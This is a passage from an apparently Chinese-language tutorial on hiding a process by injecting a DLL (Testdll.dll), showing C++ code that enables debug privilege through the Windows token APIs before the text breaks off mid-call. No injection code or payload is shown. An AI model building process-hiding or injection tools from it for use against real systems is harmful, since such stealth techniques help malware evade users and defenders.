下面的源代码将会对Testdll.dll进行调用
这个一个隐藏自己进程的基本方法
取得权限并进行注入的思路是最重要的
// ExcuteDllTest.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <windows.h>
//提升到debug权限
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
//打开进程令牌环
if(!OpenProcessToken(GetCurrentProcess(),//取得句柄的令牌 OpenProcessToken()函数
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken) )
{
printf("OpenProcessToken error./n");
return 1;
}
//获得进程本地唯一ID
if(!LookupPrivilegeValue(NULL,name,&luid) )//一个权限对应的LUID值
{
printf("LookupPrivilege error!/n");
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
//调整权限
if(!AdjustTokenPrivileges(hToken,0,&tp,size